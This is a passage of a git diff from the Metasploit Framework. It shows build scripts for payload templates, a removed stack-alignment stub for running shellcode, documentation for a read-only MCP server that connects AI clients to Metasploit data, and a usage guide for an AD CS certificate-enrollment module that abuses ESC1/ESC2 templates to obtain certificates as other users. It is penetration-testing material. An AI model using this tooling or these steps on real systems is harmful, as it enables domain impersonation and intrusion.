# +50: MinorSubsystemVersion (uint16)
# These offsets are identical for PE32 and PE32+.
$opt = $peOffset + 24
$verBytes = [BitConverter]::GetBytes([uint16]$Major)
$minBytes = [BitConverter]::GetBytes([uint16]$Minor)
$bytes[$opt + 40] = $verBytes[0]; $bytes[$opt + 41] = $verBytes[1]
$bytes[$opt + 42] = $minBytes[0]; $bytes[$opt + 43] = $minBytes[1]
$bytes[$opt + 48] = $verBytes[0]; $bytes[$opt + 49] = $verBytes[1]
$bytes[$opt + 50] = $minBytes[0]; $bytes[$opt + 51] = $minBytes[1]
[System.IO.File]::WriteAllBytes($Path, $bytes)
Write-Host " Patched OS and subsystem version to ${Major}.${Minor}"
}
function Build-Template {
param([string]$Arch, [string]$Name)
$def = $BuildDefs[$Name]
Push-Location (Join-Path $ScriptDir $def.Dir)
try {
if ($def.RcArgs) {
& rc @($def.RcArgs)
if ($LASTEXITCODE -ne 0) { throw "rc failed for $Name ($Arch)" }
}
$outName = $def.OutputFmt -f $Arch
Invoke-Cl -ClFlags $def.ClFlags -Source $def.Source -OutputName $outName `
-LinkLibs $def.LinkLibs -LinkRes $def.LinkRes `
-EntryPoint $def.EntryPoint -NoDefaultLib:([bool]$def.NoDefaultLib)
if ($Name -like 'dll*') {
$outName256 = $outName -replace '(\.\w+)$', '.256kib$1'
Invoke-Cl -ClFlags ($def.ClFlags + '/DSCSIZE=262144') -Source $def.Source -OutputName $outName256 `
-LinkLibs $def.LinkLibs -LinkRes $def.LinkRes `
-EntryPoint $def.EntryPoint -NoDefaultLib:([bool]$def.NoDefaultLib)
}
} finally { Pop-Location }
if ($def.PatchVersion) {
$outPath = Join-Path $ScriptDir "$($def.Dir)\$outName"
if ($Arch -eq 'x86') {
Set-PEVersion -Path $outPath -Major 4 -Minor 0
} else {
Set-PEVersion -Path $outPath -Major 5 -Minor 2
}
}
}
# Build each requested template for each architecture
foreach ($arch in $Architectures) {
Write-Host "`n=== Configuring for $arch ===" -ForegroundColor Cyan
Invoke-VCVars $arch
foreach ($tmpl in $Templates) {
Write-Host "`nBuilding: $tmpl ($arch)" -ForegroundColor Green
Build-Template -Arch $arch -Name $tmpl
}
}
# Clean intermediate files and move outputs
Write-Host "`n=== Cleaning up ===" -ForegroundColor Cyan
Get-ChildItem $ScriptDir -Recurse -File |
Where-Object { $_.Extension -in '.obj', '.res', '.exp', '.lib' } |
Remove-Item -Force
Write-Host "`n=== Moving outputs to $OutputDir ===" -ForegroundColor Cyan
Get-ChildItem $ScriptDir -Recurse -File |
Where-Object { $_.Extension -in '.exe', '.dll' } |
ForEach-Object {
Move-Item $_.FullName (Join-Path $OutputDir $_.Name) -Force
Write-Host " $($_.Name)"
}
Write-Host "`nDone." -ForegroundColor Green
-15
View File
@@ -1,15 +0,0 @@
@echo off
if "%~1"=="" GOTO NO_ARGUMENTS
echo Compiling for: %1
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
rc /v template.rc
cl /LD /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 template.c /Fe:template_%1_windows.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
exit /B
:NO_ARGUMENTS
%COMSPEC% /c "%0" x86
%COMSPEC% /c "%0" x64
del *.obj *.res
move *.dll ..\..\..
@@ -1,15 +0,0 @@
@echo off
if "%~1"=="" GOTO NO_ARGUMENTS
echo Compiling for: %1
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
rc /v /fo template.res ../dll/template.rc
cl /LD /GS- /DBUILDMODE=2 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
exit /B
:NO_ARGUMENTS
%COMSPEC% /c "%0" x86
%COMSPEC% /c "%0" x64
del *.exp *.lib *.res *.obj
move *.dll ..\..\..
@@ -1,15 +0,0 @@
@echo off
if "%~1"=="" GOTO NO_ARGUMENTS
echo Compiling for: %1
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
rem mscoree.lib requires .NET SDK to be installed, add it as a Visual Studio component
cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 template.cpp /Fe:template_%1_windows_mixed_mode.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 /DSCSIZE=262144 template.cpp /Fe:template_%1_windows_mixed_mode.256kib.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
exit /B
:NO_ARGUMENTS
%COMSPEC% /c "%0" x86
%COMSPEC% /c "%0" x64
del *.obj
move *.dll ..\..\..
-13
View File
@@ -1,13 +0,0 @@
@echo off
if "%~1"=="" GOTO NO_ARGUMENTS
echo Compiling for: %1
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
cl /GS- template.c /Fe:template_%1_windows.exe /link kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
exit /B
:NO_ARGUMENTS
%COMSPEC% /c "%0" x86
%COMSPEC% /c "%0" x64
del *.obj *.res
move *.exe ..\..\..
@@ -1,13 +0,0 @@
@echo off
if "%~1"=="" GOTO NO_ARGUMENTS
echo Compiling for: %1
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
cl /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows_svc.exe /link advapi32.lib kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
exit /B
:NO_ARGUMENTS
%COMSPEC% /c "%0" x86
%COMSPEC% /c "%0" x64
del *.obj *.res
move *.exe ..\..\..
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,48 +0,0 @@
/*
* This code is provided under the 3-clause BSD license below.
* ***********************************************************
*
* Copyright (c) 2013, Matthew Graeber
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
*
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
; Author: Matthew Graeber (@mattifestation)
; License: BSD 3-Clause
; Syntax: MASM
; Build Syntax: ml64 /c /Cx AdjustStack.asm
; Output: AdjustStack.obj
; Notes: I really wanted to avoid having this external dependency but I couldnt
; come up with any other way to guarantee 16-byte stack alignment in 64-bit
; shellcode written in C.
extern ExecutePayload
global AlignRSP ; Marking AlignRSP as PUBLIC allows for the function
; to be called as an extern in our C code.
segment .text
; AlignRSP is a simple call stub that ensures that the stack is 16-byte aligned prior
; to calling the entry point of the payload. This is necessary because 64-bit functions
; in Windows assume that they were called with 16-byte stack alignment. When amd64
; shellcode is executed, you cant be assured that you stack is 16-byte aligned. For example,
; if your shellcode lands with 8-byte stack alignment, any call to a Win32 function will likely
; crash upon calling any ASM instruction that utilizes XMM registers (which require 16-byte)
; alignment.
AlignRSP:
push rsi ; Preserve RSI since were stomping on it
mov rsi, rsp ; Save the value of RSP so it can be restored
and rsp, 0FFFFFFFFFFFFFFF0h ; Align RSP to 16 bytes
sub rsp, 020h ; Allocate homing space for ExecutePayload
call ExecutePayload ; Call the entry point of the payload
mov rsp, rsi ; Restore the original value of RSP
pop rsi ; Restore RSI
ret ; Return to caller
@@ -1,9 +0,0 @@
ENTRY(_ExecutePayload)
SECTIONS
{
.text :
{
*(.text.ExecutePayload)
}
}
@@ -1,11 +0,0 @@
ENTRY(AlignRSP)
SECTIONS
{
.text :
{
*(.text.AlignRSP)
*(.text.ExecutePayload)
*(.text.GetProcAddressWithHash)
}
}
+20957 -2589
View File
File diff suppressed because it is too large Load Diff
+3 -1
View File
@@ -10,7 +10,7 @@
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema[7.2].define(version: 2026_01_30_124052) do
ActiveRecord::Schema[7.2].define(version: 2026_04_11_000000) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
@@ -665,6 +665,8 @@ ActiveRecord::Schema[7.2].define(version: 2026_01_30_124052) do
t.integer "session_id"
t.integer "loot_id"
t.text "fail_detail"
t.string "check_code"
t.text "check_detail"
end
create_table "vuln_details", id: :serial, force: :cascade do |t|
@@ -64,7 +64,7 @@ Consider the following example as your HTML response:
<div id="french">Bonjour</div>
</div>
</body>
<html>
</html>
```
**Basic usage of #at**
@@ -0,0 +1,366 @@
The Metasploit MCP Server (`msfmcpd`) provides AI applications with secure, structured access to Metasploit Framework data through the [Model Context Protocol](https://modelcontextprotocol.io/) (MCP). It acts as a middleware layer between AI clients (such as Claude, Cursor, or custom agents) and Metasploit, exposing 8 standardized tools for querying reconnaissance data and searching modules.
This initial implementation is **read-only**. Only tools that query data (modules, hosts, services, vulnerabilities, etc.) are available. Tools for module execution, session interaction, and database modifications will be added in a future iteration.
## Architecture
```mermaid
flowchart TD
ai_app["AI Application<br>(Claude, Cursor, etc.)"]
subgraph msfmcp_server["MsfMcp Server"]
mcp_layer["MCP Layer (8 Tools)<br>Input Validation / Rate Limiting / Response Transformation"]
rpc_manager["RPC Manager<br>Auto-detect / Auto-start / Lifecycle Management"]
api_client["Metasploit API Client<br>MessagePack RPC (port 55553) / JSON-RPC (port 8081)<br>Session Management"]
mcp_layer --> rpc_manager
rpc_manager --> api_client
end
msf["Metasploit Framework<br>(msfrpcd)"]
ai_app -- "MCP Protocol (stdio or HTTP)<br>JSON-RPC 2.0" --> mcp_layer
api_client -- "HTTP/HTTPS" --> msf
```
## Quick Start
The simplest way to start the MCP server is with no arguments:
```
./msfmcpd
```
The server automatically detects whether a Metasploit RPC server is already running on the configured port. If not, it starts one automatically with randomly generated credentials.
To use specific credentials:
```
./msfmcpd --user your_username --password your_password
```
## Configuration
### Configuration File
Copy the example configuration and edit it:
```
cp config/mcp_config.yaml.example config/mcp_config.yaml
```
A MessagePack RPC configuration looks like this:
```yaml
msf_api:
type: messagepack
host: localhost
port: 55553
ssl: true
endpoint: /api/
user: msfuser
password: CHANGEME
auto_start_rpc: true
mcp:
transport: stdio
rate_limit:
enabled: true
requests_per_minute: 60
burst_size: 10
logging:
enabled: false
level: INFO
log_file: msfmcp.log
```
For JSON-RPC with bearer token authentication, use the JSON-RPC example instead:
```
cp config/mcp_config_jsonrpc.yaml.example config/mcp_config.yaml
```
### Command-Line Options
```
./msfmcpd --help
Options:
--config PATH Path to configuration file
--enable-logging Enable file logging with sanitization
--log-file PATH Log file path (overrides config file)
--user USER MSF API username (for MessagePack auth)
--password PASS MSF API password (for MessagePack auth)
--no-auto-start-rpc Disable automatic RPC server startup
--mcp-transport TRANSPORT MCP server transport type ('stdio' or 'http')
-h, --help Show this help message
-v, --version Show version information
```
### Environment Variable Overrides
All configuration settings can be overridden by environment variables:
| Variable | Description |
|---|---|
| `MSF_API_TYPE` | Connection type (`messagepack` or `json-rpc`) |
| `MSF_API_HOST` | Metasploit RPC API host |
| `MSF_API_PORT` | Metasploit RPC API port |
| `MSF_API_SSL` | Use SSL for Metasploit RPC API (`true` or `false`) |
| `MSF_API_ENDPOINT` | Metasploit RPC API endpoint |
| `MSF_API_USER` | RPC API username (for MessagePack auth) |
| `MSF_API_PASSWORD` | RPC API password (for MessagePack auth) |
| `MSF_API_TOKEN` | RPC API token (for JSON-RPC auth) |
| `MSF_AUTO_START_RPC` | Auto-start RPC server (`true` or `false`) |
| `MSF_MCP_TRANSPORT` | MCP transport type (`stdio` or `http`) |
| `MSF_MCP_HOST` | MCP server host (for HTTP transport) |
| `MSF_MCP_PORT` | MCP server port (for HTTP transport) |
Example using environment variables:
```
MSF_API_HOST=192.168.33.44 ./msfmcpd --config ./config/mcp_config.yaml
```
## Automatic RPC Server Management
When using MessagePack RPC on localhost, the MCP server can automatically manage the Metasploit RPC server lifecycle. This is enabled by default.
### How It Works
1. **Detection**: On startup, the MCP server probes the configured RPC port to check if a server is already running.
2. **Auto-start**: If no server is detected, it spawns the `msfrpcd` executable as a child process.
3. **Credentials**: If no username and password are provided, random credentials are generated automatically and used for both the RPC server and client authentication.
4. **Wait**: After starting, it polls the port until the RPC server becomes available (timeout: 30 seconds).
5. **Shutdown**: When the MCP server shuts down (via Ctrl+C or SIGTERM), it cleans up the managed RPC process.
**Note**: If an RPC server is already running, credentials must be provided via `--user`/`--password`, config file, or environment variables to authenticate with it.
### Database Support
The auto-started RPC server creates a framework instance with database support enabled by default. If the database is not running when the RPC server starts, a warning is displayed:
```
[WARNING] Database is not available. Some MCP tools that rely on the database will not work.
[WARNING] Start the database and restart the MCP server to enable full functionality.
```
Tools that query the database (`msf_host_info`, `msf_service_info`, `msf_vulnerability_info`, `msf_note_info`, `msf_credential_info`, `msf_loot_info`) require a running database. To initialize and start the database:
```
msfdb init
msfdb start
```
Then restart the MCP server.
### Disabling Auto-Start
Auto-start can be disabled in three ways:
- CLI flag: `--no-auto-start-rpc`
- Config file: `auto_start_rpc: false` in the `msf_api` section
- Environment variable: `MSF_AUTO_START_RPC=false`
Auto-start is also not available when:
- The API type is `json-rpc` (requires SSL certificates and a web server)
- The host is a remote address (cannot start a server on a remote machine)
When auto-start is disabled and no RPC server is running, you must start `msfrpcd` manually:
```
msfrpcd -U your_username -P your_password -p 55553
```
## MCP Tools
The server exposes 8 tools to AI applications via the MCP protocol.
### msf_search_modules
Search for Metasploit modules by keywords, CVE IDs, or module names.
- `query` (string, required): Search terms (e.g., `windows smb`, `CVE-2017-0144`)
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_module_info
Get detailed information about a specific Metasploit module.
- `type` (string, required): Module type (`exploit`, `auxiliary`, `post`, `payload`, `encoder`, `nop`)
- `name` (string, required): Module path (e.g., `windows/smb/ms17_010_eternalblue`)
Returns complete module details including options, targets, references, and authors.
### msf_host_info
Query discovered hosts from the Metasploit database.
- `workspace` (string, optional): Workspace name (default: `default`)
- `addresses` (string, optional): Filter by IP/CIDR (e.g., `192.168.1.0/24`)
- `only_up` (boolean, optional): Only return alive hosts (default: false)
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_service_info
Query discovered services on hosts.
- `workspace` (string, optional): Workspace name
- `names` (string, optional): Filter by service names, comma-separated (e.g., `http`, `ldap,ssh`)
- `host` (string, optional): Filter by host IP
- `ports` (string, optional): Filter by port or range (e.g., `80,443` or `1-1024`)
- `protocol` (string, optional): Protocol filter (`tcp` or `udp`)
- `only_up` (boolean, optional): Only return running services (default: false)
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_vulnerability_info
Query discovered vulnerabilities.
- `workspace` (string, optional): Workspace name
- `names` (array of strings, optional): Filter by vulnerability names (exact, case-sensitive module names)
- `host` (string, optional): Filter by host IP
- `ports` (string, optional): Filter by port or range
- `protocol` (string, optional): Protocol filter (`tcp` or `udp`)
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_note_info
Query notes stored in the database.
- `workspace` (string, optional): Workspace name
- `type` (string, optional): Filter by note type (e.g., `ssl.certificate`, `smb.fingerprint`)
- `host` (string, optional): Filter by host IP
- `ports` (string, optional): Filter by port or range
- `protocol` (string, optional): Protocol filter (`tcp` or `udp`)
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_credential_info
Query discovered credentials.
- `workspace` (string, optional): Workspace name
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
### msf_loot_info
Query collected loot (files, data dumps).
- `workspace` (string, optional): Workspace name
- `limit` (integer, optional): Max results (1-1000, default: 100)
- `offset` (integer, optional): Pagination offset (default: 0)
## Integration with AI Applications
Add the MCP server to your AI application configuration. The exact format depends on the client.
### Claude Desktop / Cursor
```json
{
"mcpServers": {
"metasploit": {
"command": "/path/to/metasploit-framework/msfmcpd",
"args": [
"--config",
"/path/to/config/mcp_config.yaml"
],
"env": {}
}
}
}
```
### Using RVM
If you use RVM to manage Ruby versions, specify the full path to RVM so the correct Ruby and gemset are used:
```json
{
"mcpServers": {
"metasploit": {
"command": "/your/home_dir/.rvm/bin/rvm",
"args": [
"in",
"/path/to/metasploit-framework",
"do",
"./msfmcpd",
"--config",
"config/mcp_config.yaml"
]
}
}
}
```
## Security Considerations
### Input Validation
All tool parameters are validated against strict JSON schemas. IP addresses are validated using Ruby's `IPAddr` class with CIDR support, workspace names are restricted to alphanumeric characters plus underscore/hyphen, port ranges are validated (1-65535), and search queries are limited to 500 characters.
### Credential Management
Configuration files should use `chmod 600` permissions. Credentials are transmitted securely to the Metasploit Framework API and are never cached or logged by the MCP server.
### Rate Limiting
The server applies rate limiting to all MCP tools using a token bucket algorithm. Default: 60 requests per minute with a burst of 10 requests. This is configurable in the `rate_limit` section of the configuration file.
### Logging
Logging is disabled by default. When enabled (via `--enable-logging` or config), sensitive data (passwords, tokens, API keys) is automatically redacted. Log files should be protected with `chmod 600`.
### Error Handling
Stack traces are never exposed to clients. Error messages are sanitized to avoid leaking credentials. Metasploit API errors are wrapped in the MCP error format.
## Testing with MCP Inspector
The [MCP Inspector](https://github.com/modelcontextprotocol/inspector) is an interactive developer tool for testing and debugging MCP servers. It runs directly through `npx`:
```
npx @modelcontextprotocol/inspector
```
## Troubleshooting
### Connection Refused or Timeout
1. Verify the RPC daemon is running: `ps aux | grep msfrpcd`
2. Check the port is listening: `netstat -an | grep 55553`
3. Test connectivity: `curl -k -v https://localhost:55553/api/`
### Authentication Failures
For MessagePack RPC, verify the username and password in your configuration file or CLI arguments. For JSON-RPC, verify the bearer token is valid and has not expired.
### Database Not Available
If database-dependent tools return errors, ensure the database is running:
```
msfdb init
msfdb start
```
Then restart the MCP server.
### Rate Limit Exceeded
Increase the rate limit in your configuration file:
```yaml
rate_limit:
requests_per_minute: 120
burst_size: 20
```
@@ -14,7 +14,7 @@ Metasploit currently provides multiple options for configuring target details:
Configuring this amount of options is cumbersome and time consuming on a per module basis.
Although it is is possible to globally setting common values with the `setg` command - and to individually override the ports on a per module basis, it is still an arduous task:
Although it is possible to globally setting common values with the `setg` command - and to individually override the ports on a per module basis, it is still an arduous task:
```
setg RHOSTS x.x.x.x
@@ -1,26 +1,29 @@
## On this page
* [List of supported reference identifiers](#list-of-supported-reference-identifiers)
* [Code example of references in a module](#code-example-of-references-in-a-module)
- [On this page](#on-this-page)
- [List of supported reference identifiers](#list-of-supported-reference-identifiers)
- [Code example of references in a module](#code-example-of-references-in-a-module)
A reference in a Metasploit module is a source of information related to the module. This can be a link to the vulnerability advisory, a news article, a blog post about a specific technique the module uses, a specific tweet, etc. The more you have the better. However, you should not use this as a form of advertisement.
## List of supported reference identifiers
ID | Source | Code Example
------------- | ------------- | -------------
CVE | cvedetails.com | ```['CVE', '2014-9999']```
CWE | cwe.mitre.org | ```['CWE', '90']```
BID | securityfocus.com | ```['BID', '1234']```
MSB | technet.microsoft.com | ```['MSB', 'MS13-055']```
EDB | exploit-db.com | ```['EDB', '1337']```
US-CERT-VU | kb.cert.org | ```['US-CERT-VU', '800113']```
ZDI | zerodayinitiative.com | ```['ZDI', '10-123']```
WPVDB | wpvulndb.com | ```['WPVDB', '7615']```
PACKETSTORM | packetstormsecurity.com | ```['PACKETSTORM', '132721']```
GHSA | github.com/advisories or github.com/owner/repo/security/advisories | ```['GHSA', 'xxxx-xxxx-xxxx']``` or ```['GHSA', 'xxxx-xxxx-xxxx', 'owner/repo']```
URL | anything | ```['URL', 'http://example.com/blog.php?id=123']```
AKA (_deprecated_*) | anything | ~~`['AKA', 'shellshock']`~~
| ID | Source | Code Example |
| ------------------- | ------------------------------------------------------------------ | ---------------------------------------------------------------------------------- |
| CVE | cvedetails.com | ```['CVE', '2014-9999']``` |
| CWE | cwe.mitre.org | ```['CWE', '90']``` |
| BID | securityfocus.com | ```['BID', '1234']``` |
| MSB | technet.microsoft.com | ```['MSB', 'MS13-055']``` |
| EDB | exploit-db.com | ```['EDB', '1337']``` |
| US-CERT-VU | kb.cert.org | ```['US-CERT-VU', '800113']``` |
| ZDI | zerodayinitiative.com | ```['ZDI', '10-123']``` |
| WPVDB | wpvulndb.com | ```['WPVDB', '7615']``` |
| PACKETSTORM | packetstormsecurity.com | ```['PACKETSTORM', '132721']``` |
| GHSA | github.com/advisories or github.com/owner/repo/security/advisories | ```['GHSA', 'xxxx-xxxx-xxxx']``` or ```['GHSA', 'xxxx-xxxx-xxxx', 'owner/repo']``` |
| OSV | osv.dev | ```['OSV', 'GHSA-xxxx-xxxx-xxxx']``` |
| ATT&CK | attack.mitre.org | ```['ATT&CK', 'T1190']``` |
| URL | anything | ```['URL', 'http://example.com/blog.php?id=123']``` |
| AKA (_deprecated_*) | anything | ~~`['AKA', 'shellshock']`~~ |
> **Good to know**
> AKA names for modules are no longer stored as a reference identifier, but rather in the `Notes` metadata field as shown in the example below.
@@ -42,8 +45,10 @@ class MetasploitModule < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'Author' => [ 'Unknown' ],
'References' => [
[ 'CVE', '2014-9999' ],
['CVE', '2014-9999'],
['BID', '1234'],
['GHSA', 'xxxx-xxxx-xxxx'], # global advisory
['GHSA', 'xxxx-xxxx-xxxx', 'owner/repo'], # repository-scoped advisory
['URL', 'http://example.com/blog.php?id=123']
],
'Platform' => 'win',
@@ -444,7 +444,7 @@ Now edit the `proxychains` configuration file located at `/etc/proxychains.conf`
socks5 127.0.0.1 1080
```
The final final should look something like this:
The final file should look something like this:
```ini
# proxychains.conf VER 3.1
@@ -567,7 +567,7 @@ index.html 100%[===========================>] 57.34K --.-KB/s i
```
### Scanning
For scanning with Nmap, Zenmap, Nessus and others, keep in mind that ICMP and UPD traffic cannot tunnel through the proxy. So you cannot perform ping or UDP scans.
For scanning with Nmap, Zenmap, Nessus and others, keep in mind that ICMP and UDP traffic cannot tunnel through the proxy. So you cannot perform ping or UDP scans.
For Nmap and Zenmap, the below example shows the commands can be used. It is best to be selective on ports to scan since scanning through the proxy tunnel can be slow.
@@ -17,16 +17,16 @@ Contributing modules in [GO](https://golang.org/) can be achieved in a few simpl
import "metasploit/module"
func main() {
metadata := &module.Metadata{
Name: "<module name",
Name: "<module name>",
Description: "<describe>",
Authors: []string{"<author 1>", "<author 2>"},
Date: "<date module written",
Date: "<date module written>",
Type:"<module type>",
Privileged: <true|false>,
References: []module.Reference{},
Options: map[string]module.Option{
"<option 1": {Type: "<type>", Description: "<description>", Required: <true|false>, Default: "<default>"},
"<option 2": {Type: "<type>", Description: "<description>", Required: <true|false>, Default: "<default>"},
"<option 1>": {Type: "<type>", Description: "<description>", Required: <true|false>, Default: "<default>"},
"<option 2>": {Type: "<type>", Description: "<description>", Required: <true|false>, Default: "<default>"},
}}
module.Init(metadata, <the entry method to your module>)
@@ -151,7 +151,7 @@ Run
"id": {"type": "string"},
"method": {"enum": ["run"]},
"params": {
"type": "object"
"type": "object",
"additionalProperties": false,
"patternProperties": {
"^[^=]*$": {
@@ -181,7 +181,7 @@ Run
"id": {"type": "string"},
"result": {
"type": "object",
"required": ["message"]
"required": ["message"],
"properties": {
"message": {"type": "string"},
"return": {"type": "string"}
+3
View File
@@ -448,6 +448,9 @@ NAVIGATION_CONFIG = [
{
path: 'How-to-use-Metasploit-with-ngrok.md'
},
{
path: 'How-to-use-Metasploit-MCP-Server.md'
},
]
},
]
@@ -0,0 +1,485 @@
## Vulnerable Application
This module makes authenticated requests to an Active Directory Certificate Services Web enrollment portal to gain
a list of available templates and/or generate certificates based on the available templates.
This is the same basic action as `auxiliary/server/relay/esc8` but rather then relaying NTLM credentials, we are
authenticating with credentials we have.
## Verification Steps
### NTLM
1. Install and configure the application
* See https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html
2. Start `msfconsole`
2. Do: `use auxiliary/admin/http/web_enrollment_cert`
3. Set the `RHOSTS` option to the AD CS Web Enrollment server
4. Set the `HTTP::Auth` option to `ntlm`
4. Set the `HttpUsername` option to a valid user
4. Set the `HttpPassword` option to a valid user password
4. Set `MODE`, `CERT_TEMPLATE`, and `TARGETURI` to the desired settings.
### Kerberos
1. Install and configure the application
* See https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html
2. Start `msfconsole`
2. Do: `use auxiliary/admin/http/web_enrollment_cert`
3. Set the `RHOSTS` option to the AD CS Web Enrollment server
4. Set the `HTTP::Auth` option to `kerberos`
5. Set the `DOMAIN` option to the FQDN
6. Set the `DomainControllerRhost` if it is not available through DNS
4. Set the `HttpUsername` option to a valid user
4. Set the `HttpPassword` option to a valid user password
4. Set `MODE`, `CERT_TEMPLATE`, and `TARGETURI` to the desired settings.
### ESC1
1. Install and configure the application with ESC1 vulnerable template
* https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html
2. Follow steps above based on authentication type
4. Set `MODE` to `SPECIFIC_TEMPLATE`
3. Set `CERT_TEMPLATE` to a template vulnerable to ESC1
4. Set `ALT_UPN` to the desired User
5. Set `ALT_SID` to the desired SID, if necessary
6. Set `ALT_DNS` if required
### ESC2
1. Install and configure the application with ESC2 vulnerable template
* https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html
2. Follow steps above based on authentication type
4. Set `MODE` to `SPECIFIC_TEMPLATE`
3. Set `CERT_TEMPLATE` to a template vulnerable to ESC2
4. Set `ON_BEHALF_OF` to the desired User
5. Set `PFX` to the desired certificate file
## Options
### MODE
The issue mode. This controls what the module will do once an authenticated session is established to the Web Enrollment
server. Must be one of the following options:
* ALL: Enumerate all available certificate templates and then issue each of them
* QUERY_ONLY: Enumerate all available certificate templates but do not issue any. Not all certificate templates
available for use will be displayed; templates with the flag CT_FLAG_MACHINE_TYPE set will not show available and
include `Machine` (AKA `Computer`) and `DomainController`
* SPECIFIC_TEMPLATE: Issue the certificate template specified in the `CERT_TEMPLATE` option
### CERT_TEMPLATE
The template to issue if MODE is SPECIFIC_TEMPLATE.
## Scenarios
### Windows 2019
#### NTLM with MODE ALL
```msf
msf > use auxiliary/admin/http/web_enrollment_cert
msf auxiliary(admin/http/web_enrollment_cert) > set rhost 10.5.132.180
rhost => 10.5.132.180
msf auxiliary(admin/http/web_enrollment_cert) > set httpusername Administrator
httpusername => Administrator
msf auxiliary(admin/http/web_enrollment_cert) > set httppassword v3Mpassword
httppassword => v3Mpassword
msf auxiliary(admin/http/web_enrollment_cert) > set DOMAIN EXAMPLE
DOMAIN => EXAMPLE
msf auxiliary(admin/http/web_enrollment_cert) > set MODE ALL
MODE => ALL
msf auxiliary(admin/http/web_enrollment_cert) > set HTTP::AUTH ntlm
HTTP::AUTH => ntlm
msf auxiliary(admin/http/web_enrollment_cert) > show options
Module options (auxiliary/admin/http/web_enrollment_cert):
Name Current Setting Required Description
---- --------------- -------- -----------
ALT_DNS no Alternative certificate DNS
ALT_SID no Alternative object SID
ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN)
HttpPassword v3Mpassword no The HTTP password to specify for authentication
HttpUsername Administrator no The HTTP username to specify for authentication
MODE ALL yes The issue mode. (Accepted: ALL, QUERY_ONLY, SPECIFIC_TEMPLATE)
ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\USER)
PFX no Certificate to request on behalf of
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5
h, sapni, socks4, http, socks5
RHOSTS 10.5.132.180 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /certsrv/ yes The URI for the cert server.
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
When MODE is SPECIFIC_TEMPLATE:
Name Current Setting Required Description
---- --------------- -------- -----------
CERT_TEMPLATE no The template to issue if MODE is SPECIFIC_TEMPLATE.
